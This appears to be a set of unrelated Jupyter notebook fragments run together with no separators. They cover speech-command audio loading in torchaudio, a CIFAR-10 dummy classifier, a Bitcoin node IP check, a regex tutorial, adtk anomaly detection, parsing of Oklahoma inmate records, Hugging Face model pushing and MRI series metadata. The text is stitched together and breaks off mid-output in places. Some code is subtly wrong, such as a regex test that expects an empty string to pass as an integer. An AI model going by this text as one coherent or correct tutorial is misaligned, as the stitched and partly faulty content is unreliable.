torchaudio speech_commands_dataset = torchaudio.datasets.SPEECHCOMMANDS("sample_data",download = True)The speech_commands_dataset object is an instance of a class inheriting from [torch.utils.data.Dataset](https://pytorch.org/docs/stable/data.html), which means it implements the methods * __getitem__ * __len__Thanks to this, we can find out the number of elements or get an arbitrary data element by indexing a Dataset object just like an ordinary python list.print("Number of elements: {} ".format(len(speech_commands_dataset))) print("First element",speech_commands_dataset[0])What does an element of the audio data look like?Let's consult the documentation: https://pytorch.org/audio/stable/datasets.html#speechcommands... returns: (waveform, sample_rate, label, speaker_id, utterance_number)utterance_number is the repetition index.
It is greater than zero if the same person says the same phrase several times.waveform, sample_rate, label, speaker_id, utterance_number = speech_commands_dataset[0] print("Waveform: {}\nSample rate: {}\nLabel: {} \nSpeaker_id: {} \nutterance_number: {}".format(waveform.shape, sample_rate, label,speaker_id,utterance_number))The size of the waveform tensor is [1, 16000]: 1 is the number of channels, 16000 the number of measurements per second. If the sampling rate (sample_rate) is 16000, this fragment is exactly 1 second long. Let's visualize it: x - time, y - pressure.import matplotlib.pyplot as plt print(type(waveform)) plt.figure() plt.title(f"Label: {label}") plt.plot(waveform.t().numpy())Let's play it back:import IPython.display as ipd ipd.Audio(waveform.numpy(), rate=sample_rate)Iterating over the dataset.To begin with, let's run a simple check and make sure all recordings have the same length. Why this matters:* list* numpy array* torch.tensor Check that all recordings have the same length.import torch def_length = 16000 for i, sample in enumerate(speech_commands_dataset): waveform, sample_rate, label, speaker_id, utterance_number = sample if def_length != waveform.shape[1]: # [1, 16000] print(i) print("Waveform: {}\nSample rate: {}\nLabel: {} \nSpeaker_id: {} \nutterance_number: {}".format(waveform.shape, sample_rate, label,speaker_id,utterance_number)) break if not i% 10000 and i > 0 : print(f"Processed {i} objects")If the elements do not all have the same length we cannot compare them, or even technically put them into a single array. They need to be aligned. Since many recordings begin and end with silence, we simply pad them with zeros. For this we apply the concept of transformations (transform), which is widely used in Pytorch and built into many datasets.import torchaudio class PadWaveform(torch.nn.Module): def __init__(self, desired_size = 16000): self.desired_size = desired_size super().__init__() # in nn.Module the forward method is called inside the __call__ method def forward(self, waveform): if waveform.shape[1] < self.desired_size: diff = self.desired_size - waveform.shape[1] pad_left = diff // 2 pad_right = diff - pad_left return torch.nn.functional.pad(waveform,[pad_left, pad_right]) else: return waveform class customSpeechCommandsDataset(torchaudio.datasets.SPEECHCOMMANDS): def __init__(self,transform,root = "sample_data"): self.transform = transform super().__init__(root) # Override def __getitem__(self,n): waveform, sample_rate, label, speaker_id, utterance_number = super().__getitem__(n) transformed_waveform = self.transform(waveform) return (transformed_waveform, sample_rate, label, speaker_id, utterance_number) speech_commands_dataset = customSpeechCommandsDataset(transform = torch.nn.Sequential(PadWaveform(16000)))Now additional transformations can be added, for example lowering the sampling rate (sample_rate) so that the data takes up less space. The module [torchaudio.transforms](https://pytorch.org/audio/stable/transforms.html#resample) already has a ready-made transformation for this:from torchaudio.transforms import Resample speech_commands_dataset = customSpeechCommandsDataset(transform = torch.nn.Sequential( Resample(16000,8000), PadWaveform(8000)) )Visualizing the dataThe archived dataset takes up more than 2 GB, and that is far from the limit, so we will work with it in parts. In pytorch the Dataloader class is used for this task. One of its functions is batched loading of data.
Batching will be especially useful during training.from torch.utils.tensorboard import SummaryWriter import numpy data_loader = torch.utils.data.DataLoader(speech_commands_dataset, batch_size=512, shuffle=True) writer = SummaryWriter(comment = "commands") for i, batch in enumerate(data_loader): waveforms, sample_rates, labels, speaker_ids, utterance_numbers = batch print(waveforms.shape) print(labels) # The data has been converted to tensors # Remove the 1st dimension left over from the channel writer.add_embedding(torch.squeeze(waveforms), metadata=labels ) break writer.close()Let's launch Tensorboardreinit_tensorboard(False)Do these data need to be normalized?Let's load the values of 2 arbitrary features into Tensorboard and check.writer = SummaryWriter(comment = "commands") for i, batch in enumerate(data_loader): waveforms, sample_rates, labels, speaker_ids, utterance_numbers = batch writer.add_histogram("waves" ,torch.squeeze(waveforms)[:,100]) writer.add_histogram("waves" ,torch.squeeze(waveforms)[:,200]) break writer.close()As the histogram shows, the data is already centered around zero and on a single scale. This is partly because all values have the same nature, and partly due to the way sound is stored. TrainingFor training we will need labels; along the way we will drop what we do not need. Let's create one more transformation.class ClassName2Num(torch.nn.Module): def __init__(self): super().__init__() # Note: the label-to-number mapping is actually implemented in customSpeechCommandsDatasetFinal below, so this transform simply passes the waveform through def forward(self, waveform): return waveform class customSpeechCommandsDatasetFinal(customSpeechCommandsDataset): def __init__(self,transform = torch.nn.Sequential(),root = "sample_data"): super().__init__(transform,root) self.labels = self.get_labels() def get_labels(self): labels = set() for i in range(len(self)): item = super(customSpeechCommandsDataset,self).__getitem__(i) labels.add(item[2]) return sorted(list(labels)) # Override def __getitem__(self,n): waveform, sample_rate, label, speaker_id, utterance_number = super().__getitem__(n) return (waveform[0],self.labels.index(label)) speech_commands_dataset = customSpeechCommandsDatasetFinal(transform = torch.nn.Sequential( Resample(16000,8000), PadWaveform(8000)) ) print("Classes",speech_commands_dataset.labels) print("Classes num",len(speech_commands_dataset.labels)) wave, cls_num = speech_commands_dataset[0] print(wave.shape)Let's split the data into training and validation setstotal_len = len(speech_commands_dataset ) print("Total length",total_len) val_len = int(total_len*0.1) train_set, val_set = torch.utils.data.random_split(speech_commands_dataset, [total_len - val_len, val_len]) import numpy from sklearn import metrics from sklearn.linear_model import SGDClassifier def validate(model): data_loader = torch.utils.data.DataLoader(val_set, batch_size=1000, shuffle=False) accuracy = [] for batch in data_loader: waveforms, class_nums = batch y_pred = model.predict(waveforms) accuracy.append(metrics.accuracy_score(class_nums, y_pred)) print("Accuracy:",numpy.array(accuracy).mean()) model = SGDClassifier(loss='log') data_loader = torch.utils.data.DataLoader(train_set, batch_size=20000, shuffle=True) for batch in data_loader: waveforms, class_nums = batch model.partial_fit(waveforms, class_nums,range(35)) validate(model)The accuracy is low. A deep model is needed to work with this data; with one, an accuracy of over 85% can be achieved:[Speech Command Recognition with torchaudio](https://colab.research.google.com/github/pytorch/tutorials/blob/gh-pages/_downloads/d87597d0062580c9ec699193e951e3f4/speech_command_recognition_with_torchaudio.ipynb#scrollTo=tl9K6deU4S10)
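As a very rough sketch of what such a deep model could look like (an illustrative architecture, not the one from the linked tutorial; the layer sizes are arbitrary choices), a small 1D convolutional network over the padded 8000-sample waveforms with 35 output classes can be defined like this:

import torch
from torch import nn

class SmallAudioCNN(nn.Module):
    def __init__(self, n_classes=35):
        super().__init__()
        self.features = nn.Sequential(
            nn.Conv1d(1, 32, kernel_size=80, stride=4), nn.ReLU(), nn.MaxPool1d(4),
            nn.Conv1d(32, 64, kernel_size=3), nn.ReLU(), nn.MaxPool1d(4),
        )
        self.head = nn.Linear(64, n_classes)

    def forward(self, x):        # x: (batch, samples)
        x = x.unsqueeze(1)       # -> (batch, 1, samples) for Conv1d
        x = self.features(x)     # -> (batch, 64, reduced length)
        x = x.mean(dim=2)        # global average pooling over time
        return self.head(x)      # -> (batch, n_classes) class scores

model = SmallAudioCNN()
dummy_batch = torch.randn(4, 8000)   # stands in for a batch of padded waveforms
print(model(dummy_batch).shape)      # torch.Size([4, 35])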
A place for a discussion of how a row in a table fundamentally differs from an audio recording..... A few pictures should probably be added here.....* 1D - Tables (columns are not ordered)* 2D - Audio (data ordered in time)* 3D - Monochrome images* 4D - Color images, monochrome 3-dimensional images (MRI)* 5D - Video, voxel images* 6D - 3-dimensional video Working with images Let's load the CIFAR-10 dataset. It consists of 60000 color images of size 32x32 showing objects of 10 classes. Unlike torchaudio, the torchvision package used to load the dataset is among those preinstalled in colab. Datasets from torchvision support the transforms mechanism out of the box - we will not have to add it by hand - as well as the split into training and test subsets.from torchvision import models, datasets, transforms from torch.utils.data import DataLoader trainset = datasets.CIFAR10("content", train=True, download=True) valset = datasets.CIFAR10("content", train = False, download=True)Let's display a few pictures together with their labels. There is a helper for displaying a grid of images:[torchvision.utils.make_grid](https://pytorch.org/docs/stable/torchvision/utils.html)However it does not support labels: https://discuss.pytorch.org/t/add-label-captions-to-make-grid/42863 so we will use matplotlib insteadimport matplotlib.pyplot as plt import numpy as np import pickle plt.rcParams["figure.figsize"] = (20,10) # Load the class names. Purely for readability; they are not needed to train the model. with open("content/cifar-10-batches-py/batches.meta",'rb') as infile: cifar_meta = pickle.load(infile) labels = cifar_meta['label_names'] for j in range(10): image, class_num = trainset[j] plt.subplot(1, 10 ,j+1) plt.imshow(image) plt.axis('off') plt.title(labels[class_num])Let's look at the format in which an image is kept in memorytrainset[0]It turns out to be a [PIL](https://pillow.readthedocs.io/en/stable/reference/Image.html) image. To train a model we will have to convert the images to tensors. For this we use transforms and a Dataloader. Let's print the shapes of the resulting tensors:from torch.utils.data import DataLoader valset.transform = transforms.Compose([ transforms.ToTensor(), ]) # PIL Image to Pytorch tensor val_dataloder = DataLoader(valset, batch_size=8, shuffle=False) for batch in val_dataloder: images, class_nums = batch print(len(batch)) print("Images: ",images.shape) print("Class nums: ",class_nums.shape) breakLet's sort out the dimensions: on each iteration the dataloader returns a tuple of two elements. The first is the images, the second the class labels; the number of elements in each equals batch_size (8). An image:3 - C, channels (unlike PIL and OpenCV they come first)32 - H, height32 - W, width Labels:numbers from 0 to 9, one per class. Let's create a stub model. It will not predict anything, only return a random class number. In the fit method the data is simply stored.
This code fragment can be reused when doing the practical assignment.import torch class FakeModel(torch.nn.Module): def __init__(self): super().__init__() self.train_data = None self.train_labels = None def fit(self,x,y): self.train_data = torch.vstack((self.train_data,x)) if self.train_data is not None else x self.train_labels = torch.hstack((self.train_labels,y)) if self.train_labels is not None else y def forward(self,x): class_count = torch.unique(self.train_labels).shape[0] # randint's upper bound is exclusive, so use class_count to allow every class number class_num = torch.randint(low = 0, high = class_count, size = (x.shape[0],)) return class_numLet's run the training processtrainset.transform = transforms.Compose([ transforms.ToTensor(), ]) # PIL Image to Pytorch tensor train_dataloder = DataLoader(trainset, batch_size=1024, shuffle=True) model = FakeModel() for img_batch, labels_batch in train_dataloder: model.fit(img_batch, labels_batch)Let's check the model on a few images from the test datasetimg_batch, class_num_batch = next(iter(val_dataloder)) predicted_cls_nums = model(img_batch) for i, predicted_cls_num in enumerate(predicted_cls_nums): img = img_batch[i].permute(1,2,0).numpy()*255 plt.subplot(1, len(predicted_cls_nums),i+1) plt.imshow(img.astype(int)) plt.axis('off') plt.title(labels[int(predicted_cls_num)])Let's compute the accuracyfrom sklearn.metrics import accuracy_score accuracy = [] for img_batch, labels_batch in val_dataloder: predicted = model(img_batch) batch_accuracy = accuracy_score(labels_batch, predicted) accuracy.append(batch_accuracy) print("Accuracy",torch.tensor(accuracy).mean())unreachable_ip_set = set(unreachable_ips)bitnodes_ip_set = set(bitnodes_ips)intersection = unreachable_ip_set.intersection(bitnodes_ip_set)print(intersection)print(f"unreachable={len(unreachable_ip_set)} in_bitnodes={len(intersection)}") from ibd import utils results = [] errors = [] for ip in intersection: try: vm = utils.get_version_message((ip, 8333)) results.append(vm) except Exception as e: errors.append(e) print(f"{len(results)}/{len(results)+len(errors)}") import json json.dumps(list(intersection)) open("good-addrs-that-fail.json", "w").write(json.dumps(list(intersection))) json.loads(open("good-addrs-that-fail.json", "r").read()) "2001:0:ca62:187d:10ea:2b7a:3f57:fe95" in bitnodes_ipsqgridhttps://github.com/quantopian/qgrid how to install qgrid for jupyterNotebook (not jupyterLab)`pip install qgrid``jupyter nbextension enable --py --sys-prefix qgrid``jupyter nbextension enable --py --sys-prefix widgetsnbextension` populate example data and show qgridimport qgrid import pandas as pd import numpy as np df_types = pd.DataFrame({ 'A' : pd.Series(['2013-01-01', '2013-01-02', '2013-01-03', '2013-01-04', '2013-01-05', '2013-01-06', '2013-01-07', '2013-01-08', '2013-01-09'],index=list(range(9)),dtype='datetime64[ns]'), 'B' : pd.Series(np.random.randn(9),index=list(range(9)),dtype='float32'), 'C' : pd.Categorical(["washington", "adams", "washington", "madison", "lincoln","jefferson", "hamilton", "roosevelt", "kennedy"]), 'D' : ["foo", "bar", "buzz", "bippity","boppity", "foo", "foo", "bar", "zoo"] }) df_types['E'] = df_types['D'] == 'foo' qgrid.set_grid_option('maxVisibleRows', 10) # can easily view ~1 million rows qgrid_widget = qgrid.show_grid(df_types, show_toolbar=True) qgrid_widgetget changed dfqgrid_widget.get_changed_df()show nan and Noneimport pandas as pd import numpy as np import qgrid df = pd.DataFrame([(pd.Timestamp('2017-02-02'), None, 3.4), (np.nan, 2, 4.7), (pd.Timestamp('2017-02-03'), 3, None)]) qgrid.show_grid(df)Introduction to Python
Regex ModuleIn this notebook, we explore regex module functions and capabilitieshttps://docs.python.org/3/library/re.htmlimport re # python regex moduleRaw String and Regular StringAlways use Raw string for Regex Patterns# regular string. embedded special characters are intrepreted by python s = 'a\tb' # raw string. python does not interpret the content of the string. # USE RAW STRING FOR REGEX PATTERNS sr = r'a\tb' print('regular string:', s) print() print('raw string:', sr)re.match - Find first matchFind match at the beginning of a stringUseful for strict validation - for example, validating input from userspattern = r"\d+" # \d = digit. + = one or more. This pattern matches one or more digits text = "42 is my lucky number" match = re.match(pattern,text) # check if match was successful if match: print (match.group(0)) else: print ("No match") pattern = r"\d+" # \d = digit. + = one or more. This pattern matches one or more digits # number is not at the beginning. So, this match will fail text = "my lucky number is 42" match = re.match(pattern, text) if match: print(match.group(0)) else: print("No Match")input validationdef is_integer(text): # Pattern 1 # \d = digit # \d+ = one or more digits # pattern = r"\d+" # Pattern 2 # $ = end of string or line # one or more digits. followed by end of string or line # not cross-platform. works only with match method # pattern = r"\d+$" # Pattern 3 # start of string or line. followed by one or more digits. followed by end of string or line # ^ = start of string or line. # $ = end of string or line # cross-platform pattern = r"^\d+$" match = re.match(pattern, text) if match: return True else: return False is_integer("1234")Unit Testdef test_is_integer(): pass_list = ["123","","900","0991"] fail_list = ["a123","124a","1 2 3","1\t2"," 12","45 "] for text in pass_list: if not is_integer(text): print('\tFailed to detect an integer',text) for text in fail_list: if is_integer(text): print('\tIncorrectly classified as an integer',text) print('Test complete') test_is_integer()re.search - Find the first match anywherepattern = r"\d+" # one or more digits text = "42 is my lucky number" match = re.search(pattern,text) # check if match was successful if match: print('Found a match:', match.group(0), 'at index:', match.start()) else: print ("No match") pattern = r"\d+" # \d = digit. + = one or more. This pattern matches one or more digits # search method will look for the first match anywhere in the text text = "my lucky number is 42" match = re.search(pattern, text) if match: print('Found a match:',match.group(0), 'at index:', match.start()) else: print("No Match") # But, it finds only the first match in the text pattern = r"\d+" # \d = digit. + = one or more. 
This pattern matches one or more digits # search method will look ONLY for the first match anywhere in the text text = "my lucky numbers are 42 and 24" match = re.search(pattern, text) if match: print('Found a match:',match.group(0), 'at index:', match.start()) else: print("No Match")TODO: Modify is_integer to use search method re.findall - Find all the matchesmethod returns only after scanning the entire text# Find all numbers in the text pattern = r"\d+" text = "NY Postal Codes are 10001, 10002, 10003, 10004" print ('Pattern',pattern) # successful match match = re.findall(pattern, text) if match: print('Found matches:', match) else: print("No Match")re.finditer - Iteratormethod returns an iterator with the first match and you have control to ask for more matchespattern = r"\d+" text = "NY Postal Codes are 10001, 10002, 10003, 10004" print ('Pattern',pattern) # successful match match_iter = re.finditer(pattern, text) print ('Matches') for match in match_iter: print('\t', match.group(0), 'at index:', match.start())groups - find sub matches group 0 = refers to the text in a string that matched the patterngroup 1..n onwards refer to the sub-groups# Separate year, month and day # 1. pattern = r"\d+" # 2. pattern = r"\d{4}\d{2}\d{2}" # 3. pattern = r"(\d{4})(\d{2})(\d{2})" pattern = r"(\d{4})(\d{2})(\d{2})" text = "Start Date: 20200920" print("Pattern",pattern) match = re.search(pattern, text) if match: print('Found a match', match.group(0), 'at index:', match.start()) print('Groups', match.groups()) for idx, value in enumerate(match.groups()): print ('\tGroup', idx+1, value, '\tat index', match.start(idx+1)) else: print("No Match")named groups# Separate year, month and day pattern = r"(?P<year>\d{4})(?P<month>\d{2})(?P<day>\d{2})" text = "Start Date: 20200920" print("Pattern",pattern) match = re.search(pattern, text) if match: print('Found a match', match.group(0), 'at index:', match.start()) print('\t',match.groupdict()) else: print("No Match")access by group name# Separate year, month and day pattern = r"(?P<year>\d{4})(?P<month>\d{2})(?P<day>\d{2})" text = "Start Date: 20200920" print("Pattern",pattern) match = re.search(pattern, text) if match: print('Found a match', match.group(0), 'at index:', match.start()) print('\tYear:',match.group('year')) print('\tMonth:',match.group('month')) print('\tDay:',match.group('day')) else: print("No Match")
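The same named groups also work with re.finditer from earlier, which is a convenient way to pull every date out of a longer string; a small sketch reusing the date pattern above on an example text:

import re

pattern = r"(?P<year>\d{4})(?P<month>\d{2})(?P<day>\d{2})"
text = "Start Date: 20200920, End Date: 20210920"
for match in re.finditer(pattern, text):
    print(match.groupdict())   # {'year': '2020', 'month': '09', 'day': '20'}, then the end date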
re.sub - find and replace two patterns: one to find the text and another pattern with replacement text# Format date # 20200920 => 09-20-2020 pattern = r"(?P<year>\d{4})(?P<month>\d{2})(?P<day>\d{2})" text = "Start Date: 20200920, End Date: 20210920" # substitute with month-day-year replacement_pattern = r"\g<month>-\g<day>-\g<year>" print ('original text\t', text) print() # find and replace new_text= re.sub(pattern, replacement_pattern, text) print('new text\t', new_text) # Make this an exercise # find one or more digits followed by the word dollars. capture the digits in value group pattern = r"(?P<value>\d+)dollars" text = "movie ticket: 15dollars. popcorn: 8dollars" # substitute with value space dollars replacement_pattern = r"\g<value> dollars" print ('original text\t', text) print() # find and replace new_text= re.sub(pattern, replacement_pattern, text) print('new text\t', new_text)custom function to generate replacement text# Format # 20200920 => Sep-20-2020 import datetime def format_date(match): in_date = match.groupdict() year = int(in_date['year']) month = int(in_date['month']) day = int(in_date['day']) #https://docs.python.org/3/library/datetime.html#strftime-strptime-behavior return datetime.date(year,month,day).strftime('%b-%d-%Y') # Format date pattern = r"(?P<year>\d{4})(?P<month>\d{2})(?P<day>\d{2})" text = "Start Date: 20200920, End Date: 20210920" print ('original text\t', text) print() # find and replace new_text= re.sub(pattern, format_date, text) print('new text\t', new_text) # Make this an assignment def celsius_to_fahrenheit(match): degCelsius = float(match.group("celsius")) degF = 32.0 + (degCelsius * 9.0 / 5.0); return '{0}°F'.format(degF); def substitution_example_custom_logic(): pattern = r"(?P<celsius>\d+)\u00B0C" text = "Today's temperature is 25°C" print ('Pattern: {0}'.format(pattern)) print ('Text before: {0}'.format(text)) new_text = re.sub(pattern, celsius_to_fahrenheit, text) print('Text after: {0}'.format(new_text)) substitution_example_custom_logic()re.split - split text based on specified patternpattern = r"," text = "a-c,x,y,1" re.split(pattern,text)Read a single file, set the model type by hand, write out the resultimport numpy as np import pandas as pd from plotly.subplots import make_subplots import sys import os # import detector from adtk.visualization import plot from adtk.data import validate_series from adtk.detector import LevelShiftAD, PersistAD, SeasonalAD, VolatilityShiftAD from adtk.aggregator import OrAggregatorSet directories for data# file for drive def filepathRZ(option=1): if option ==1: DATA_FOLDER="/content/drive/MyDrive/for_students/data_v1/training/" DATA_FOLDER2="/content/drive/MyDrive/for_students/data_v1/" DATA_FOLDER3="/content/drive/MyDrive/for_students/data_v2/training/" DATA_FOLDER4="/content/drive/MyDrive/for_students/data_v2/" DATA_FOLDER5='/content/drive/MyDrive/for_students//Submission/data_v2/' return DATA_FOLDER, DATA_FOLDER2, DATA_FOLDER3, DATA_FOLDER4, DATA_FOLDER5 elif option==2: # file for local DATA_FOLDER = sys.path[0] + '/data_v1/training/' # v1 training data DATA_FOLDER2 = sys.path[0] + '/data_v1/' # v1 prediction data DATA_FOLDER3 = sys.path[0] + '/data_v2/training/' # v2 training data DATA_FOLDER4 = sys.path[0] + '/data_v2/' # v2 prediction data DATA_FOLDER5 = sys.path[0] + '/Submission/data_v2/' # output path for predictions return DATA_FOLDER, DATA_FOLDER2, DATA_FOLDER3, DATA_FOLDER4, DATA_FOLDER5 DATA_FOLDER, DATA_FOLDER2, DATA_FOLDER3, DATA_FOLDER4, DATA_FOLDER5= filepathRZ(2)set updef read_for_adtk( folder_name, file_name ):# read the csv file df = pd.read_csv('%s'%folder_name + '%s'%file_name, index_col = ['timestamp'], parse_dates=True, squeeze=True) try: df = df.drop(['request_count'], axis=1) except: print('non') return df def load_file(folder_path, file_name): df = read_for_adtk(folder_path, file_name) s_train = validate_series(df) return df, s_train from adtk.pipe import Pipenet # data is an adtk validated series def detect_anomaly( data, mode = 'LevelShift'): if mode == 'LevelShift': print('mode is', mode) dect = LevelShiftAD(20) elif mode == 'Persist': print('mode is', mode) dect = PersistAD(window = 1150) elif mode == 'Seasonal': print('mode is', mode) dect = SeasonalAD() elif mode == 'VolatilityShift': print('mode is', mode) dect = VolatilityShiftAD(window = 25) elif mode ==
'PersistLevelShiftMixed': # detect levelshift and persist(spike) anomaly simultaneously # 为什么连接之后, 数据少了dataset4 22695->22683 steps = { 'levelshift': { 'model': LevelShiftAD(80), "input": "original" }, 'persist':{ 'model': PersistAD(window = 1150), "input": "original" }, 'mixed':{ 'model': OrAggregator(), "input": ["levelshift", "persist"] } } dect = Pipenet(steps) anomalies = dect.fit_detect(data) # plot plot(data, anomaly=anomalies, anomaly_color="red", anomaly_tag="marker") return anomalies def output_result(folder_path, file_name, original_df, anomaly, replace = False ): if replace == True: final_path = folder_path + file_name else: final_path = folder_path + 'res_' + file_name print(final_path) # 修改anomaly的名字(原先为数据名) anomaly.name = 'anomaly_label' # 填充空值 anomaly = anomaly.fillna(value = 0) print(anomaly[anomaly == '1']) # 修改为int anomaly = anomaly.astype(int) # 两表连接 anomaly = anomaly[~anomaly.index.duplicated()] original_df = original_df[~original_df.index.duplicated()] out = pd.concat([original_df, anomaly], axis = 1) # 输出 out.to_csv(final_path, index=True) def individual(folder_name, file, mode, replace, factors = []): df, s_train = load_file( DATA_FOLDER4, file) anomalies = detect_anomaly(s_train, mode ) output_result(DATA_FOLDER4, file, df, anomalies, replace) # test mode_dict = {'dataset_1.csv': 'LevelShift', 'dataset_2.csv': 'LevelShift', 'dataset_3.csv': 'LevelShift', 'dataset_4.csv': 'PersistLevelShiftMixed', 'dataset_5.csv': 'LevelShift', 'dataset_6.csv': 'LevelShift', 'dataset_7.csv': 'LevelShift', 'dataset_8.csv': 'Seasonal', 'dataset_9.csv': 'VolatilityShift', 'dataset_10.csv': 'LevelShift', 'dataset_11.csv': 'Seasonal', 'dataset_12.csv': 'VolatilityShift', 'dataset_13.csv': 'Seasonal', 'dataset_100.csv': 'LevelShift', 'dataset_101.csv': 'LevelShift', 'dataset_102.csv': 'LevelShift', 'dataset_103.csv': 'LevelShift', 'dataset_105.csv': 'LevelShift', 'dataset_106.csv': 'LevelShift', } all_files = os.listdir(DATA_FOLDER4) # four mode: LevelShift, Persist, Seasonal, VolatilityShift, PersistLevelShiftMixed for file_name in all_files: if file_name[-4:] == '.csv': print(file_name) try: mode = mode_dict[file_name] individual(DATA_FOLDER4, file_name, mode, replace = False) except: print('something wrong about', file_name) continueres_dataset_8.csv something wrong about res_dataset_8.csv res_dataset_9.csv something wrong about res_dataset_9.csv dataset_106.csv mode is LevelShift /Users/jarrywang/Documents/Job/Huawei/soybean/data_v2/res_dataset_106.csv kpi_value timestamp 2020-08-17 02:00:00+02:00 NaN 2020-08-17 02:06:00+02:00 NaN 2020-08-17 02:08:00+02:00 NaN 2020-08-17 02:09:00+02:00 NaN 2020-08-17 02:15:00+02:00 NaN ... ... 2020-08-31 01:55:00+02:00 NaN 2020-08-31 01:56:00+02:00 NaN 2020-08-31 01:57:00+02:00 NaN 2020-08-31 01:58:00+02:00 NaN 2020-08-31 02:00:00+02:00 NaN [14121 rows x 1 columns] res_dataset_102.csv something wrong about res_dataset_102.csv res_dataset_103.csv something wrong about res_dataset_103.csv dataset_105.csv mode is LevelShift /Users/jarrywang/Documents/Job/Huawei/soybean/data_v2/res_dataset_105.csv kpi_valu[...]ODOC Public Inmate DataThis notebook is intended as a start for research of the ODOC data. To use this notebook, follow the setup instructiion found [here](https://github.com/codefortulsa/odoc-parse). Then download the data published [here](http://doc.publishpath.com/odoc-public-inmate-data). Unzip the file and place the files in a subdirectory called 'data'.The set of files includes a ReadMe.txt which describes the files and their fixed formats. 
The sections of this notebook show description of each file and how to import it into pandas dataframes. NOTE: the widths variables differ slighty from the description to handle some difference in the data.import pandas as pdSchedule A - Profile Data Layout ``` ======================================================= Name Null? Type ------------------------------- -------- ---- DOC_NUM NOT NULL NUMBER(10) LAST_NAME VARCHAR2(30) FIRST_NAME VARCHAR2(30) MIDDLE_NAME VARCHAR2(30) SUFFIX VARCHAR2(5) LAST_MOVE_DATE DATE 'DD-MMM-YY' (9) FACILITY VARCHAR2(40) BIRTH_DATE DATE 'DD-MMM-YY' (9) SEX VARCHAR2(1) RACE VARCHAR2(40) HAIR VARCHAR2(40) HEIGHT_FT VARCHAR2(2) HEIGHT_IN VARCHAR2(2) WEIGHT VARCHAR2(4) EYE VARCHAR2(40) STATUS VARCHAR2(10) ```file = 'data/Vendor_Profile_Sample_Text.dat' # uncomment this line to use the full dataset # file = 'data/Vendor_Profile_Extract_Text.dat' names = [ "DOC_NUM" ,"LAST_NAME" ,"FIRST_NAME" ,"MIDDLE_NAME" ,"SUFFIX" ,"LAST_MOVE_DATE" ,"FACILITY" ,"BIRTH_DATE" ,"SEX" ,"RACE" ,"HAIR" ,"HEIGHT_FT" ,"HEIGHT_IN" ,"WEIGHT" ,"EYE" ,"STATUS" ] widths = [ 11, 30, 30, 30, 5, 9, 40, 9, 1, 40, 40, 2, 2, 4, 40, 10 ] profile_df = pd.read_fwf(file, header=None, widths=widths, names=names) profile_df.head(20)Schedule B - Alias Data Layout```======================================================= Name Null? Type ------------------------------- -------- ---- DOC_NUM NOT NULL NUMBER(10) LAST_NAME VARCHAR2(30) FIRST_NAME VARCHAR2(30) MIDDLE_NAME VARCHAR2(30) SUFFIX VARCHAR2(5)```file = 'data/Vendor_Alias_Sample_Text.dat' # uncomment this line to use the full dataset # file = 'data/Vendor_Alias_Extract_Text.dat' names = [ "DOC_NUM", "LAST_NAME", "FIRST_NAME", "MIDDLE_NAME", "SUFFIX" ] widths = [ 11, 30, 30, 30, 5 ] alias_df = pd.read_fwf(file, header=None, widths=widths, names=names) alias_df.head(20)Schedule C - Sentence Data Layout```=======================================================Incarcerated_Term_In_Years = 9999 indicates a death sentenceIncarcerated_Term_In_Years = 8888 indicates a life without parole sentenceIncarcerated_Term_In_Years = 7777 indicates a life sentence======================================================= Name Null? Type ------------------------------- -------- ---- DOC_NUM NOT NULL NUMBER(10) STATUTE_CODE NOT NULL VARCHAR2(40) SENTENCING_COUNTY VARCHAR2(40) JS_DATE DATE 'YYYYMMDD' (8) CRF_NUMBER VARCHAR2(40) INCARCERATED_TERM_IN_YEARS NUMBER(10,2) PROBATION_TERM_IN_YEARS NUMBER(10,2) ```file = 'data/Vendor_sentence_Sample_Text.dat' # uncomment this line to use the full dataset # file = 'data/Vendor_sentence_Extract_Text.dat' names =[ "DOC_NUM", "STATUTE_CODE", "SENTENCING_COUNTY", "JS_DATE", "CRF_NUMBER", "INCARCERATED_TERM_IN_YEARS", "PROBATION_TERM_IN_YEARS" ] # first char in file is blank so offset by one in DOC_NUM field widths = [ 11, 40, 40, 9, 40, 13, 13 ] sentence_df = pd.read_fwf(file, header=None, widths=widths, names=names) sentence_df.head(20)Schedule D - Offense Codes Layout======================================================= ``` Name Null? 
Type ------------------------------- -------- ---- STATUTE_CODE NOT NULL VARCHAR2(38) DESCRIPTION NOT NULL VARCHAR2(40) VIOLENT VARCHAR2(1)```# NOTE: No sample file for this data file = 'data/Vendor_Offense_Extract_Text.dat' names = [ "STATUTE_CODE", "DESCRIPTION", "VIOLENT", ] widths = [ 38, 40, 1 ] offense_df = pd.read_fwf(file, header=None, widths=widths, names=names) offense_df.head(20)Examples- profile_df: demographics- alias_df: - sentence_df: statute- offense_dfNOTE: Don't forget, these examples are based on sample data.active_inmates = profile_df.query("STATUS == 'Active'") joined_df = pd.merge(active_inmates, sentence_df, on='DOC_NUM', how='left') joined_df.head(20) import numpy as np import matplotlib.pyplot as plt graph_df = joined_df.groupby(['RACE'])['DOC_NUM'].count() graph_df.plot.pie(y='RACE', figsize=(5, 5))Enter your login, password from huggingface.co !transformers-cli login !git lfs install !git config --global user.email "" !git config --global user.name "username"# APIkey can be found in https://huggingface.co/settings/token https://UserName:APIkey@huggingface.co/username/model-name-in-huggingface # Get to your directory %cd Albumin # After changes are made add and commit to git !git add . && git commit -m "Update from $USER, pushed model" # Check logs !git log # In case hooks doesnt have a permision to work #!chmod 777 .git/hooks/pre-push !git push # Obviously there is easier way to push your model from transformers import AutoModel model = AutoModel.from_pretrained("model-directory") model.push_to_hub("model-name-in-huggingface") # Also if you have tokenizer from transformers import AutoTokenizer tokenizer = AutoTokenizer.from_pretrained("model-directory") tokenizer.push_to_hub("model-name-in-huggingface")series.predict> Methods for predicting MRI series types using a previously trained `RandomForestClassifier` trained with `scikit-learn`.#export from dicomtools.basics import * #export path = Path('dicomtools/models') _model_path = path/'mr-brain-series-select-rf.skl' _y_names = pd.Index([ 't1', 't2', 'swi', 'dwi', 'other', 'flair', 'adc', 'loc', 'spgr', 'mra' ]) _features = ['MRAcquisitionType', 'AngioFlag', 'SliceThickness', 'RepetitionTime', 'EchoTime', 'EchoTrainLength', 'PixelSpacing', 'ContrastBolusAgent', 'InversionTime', 'DiffusionBValue', 'seq_E', 'seq_EP', 'seq_G', 'seq_GR', 'seq_I', 'seq_IR', 'seq_M', 'seq_P', 'seq_R', 'seq_S', 'seq_SE', 'var_E', 'var_K', 'var_MP', 'var_MTC', 'var_N', 'var_O', 'var_OSP', 'var_P', 'var_S', 'var_SK', 'var_SP', 'var_SS', 'var_TOF', 'opt_1', 'opt_2', 'opt_A', 'opt_ACC_GEMS', 'opt_B', 'opt_C', 'opt_D', 